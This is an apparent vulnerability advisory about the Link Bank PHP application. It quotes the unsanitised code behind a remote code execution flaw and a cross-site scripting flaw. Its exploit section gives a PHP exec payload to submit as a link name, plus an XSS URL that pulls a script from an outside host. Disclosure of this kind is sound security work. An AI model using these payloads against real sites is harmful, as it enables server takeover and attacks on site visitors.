<<< Date Index >>>     <<< Thread Index >>>

link bank code execution and xss



??? summary
        software: Link Bank
        vendors website: http://daverave.64digits.com/index.php?page=linkbank
        versions: n/a
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard
        risk level: high

??? description
        Link Bank does not sanatise post sumbited to it allowing users to
        insert data that can be used malisiously. after it is submited the 
        data goes to a .txt file witch the application reads and executes
        to display the links submited. along with this it is vulnerable
        to xss due to the application not sanatising the variable again.
        
        in ./content/index.txt:
14      <?php
15      include("links.txt");
16      ?>
        
        in ./content/add_link.txt:
2       $url_name = $_REQUEST['url_name'];
3       $url = $_REQUEST['url'];
4       $img = $_REQUEST['img'];
5       $filename = "content/links.txt";
6       $code = "<a href = iframe.php?site=$url 
target=_blank>$url_name</a><br>";

        in ./iframe.php:
3       <title>Link Bank - <?php echo"$site";?></title>

??? exploit(s)
        code execution:
        submit something like <?php exec($cmd) ?> as a link name

        xss:
        
http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

??? credit
        author(s): retard
        email: retard@xxxxxxxxxx